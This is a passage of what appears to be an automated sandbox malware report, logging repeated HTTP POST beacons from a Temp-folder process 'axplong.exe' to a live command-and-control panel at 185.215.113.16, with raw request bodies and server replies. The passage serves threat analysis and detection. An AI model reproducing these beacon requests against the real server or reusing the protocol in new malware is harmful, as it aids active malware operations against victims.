                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:05.433532953 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.649700185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:05.561290979 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:06.351094007 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:06.351958990 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:06.606599092 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.649701185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:06.727173090 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:07.535132885 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:07 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:07.536278009 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:07.806822062 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:07 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.649702185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:07.956955910 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:08.716974974 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:08.717758894 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:09.033060074 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.649703185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:09.147656918 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:09.888726950 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:09 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:09.889708996 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:10.137224913 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:10 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.649704185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:10.256383896 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:11.053632021 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:10 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:11.054737091 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:11.302748919 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:11 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.649708185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:11.412678003 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:12.245943069 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:12.246722937 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:12.502916098 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.649710185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:12.625777006 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:13.428133965 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:13.436844110 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:13.689023972 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.649714185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:13.811487913 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:14.559926987 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:14 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:14.561880112 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:14.808888912 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:14 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.649715185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:14.929208994 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:15.678265095 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:15.679366112 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:15.942840099 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.649716185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:16.053364038 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:16.804059982 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:16 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:16.805102110 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:17.097984076 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:16 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.649717185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:17.217320919 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:17.974831104 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:17.975611925 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:18.225573063 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:18 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.649718185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:18.334990025 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:19.122694969 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:18 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
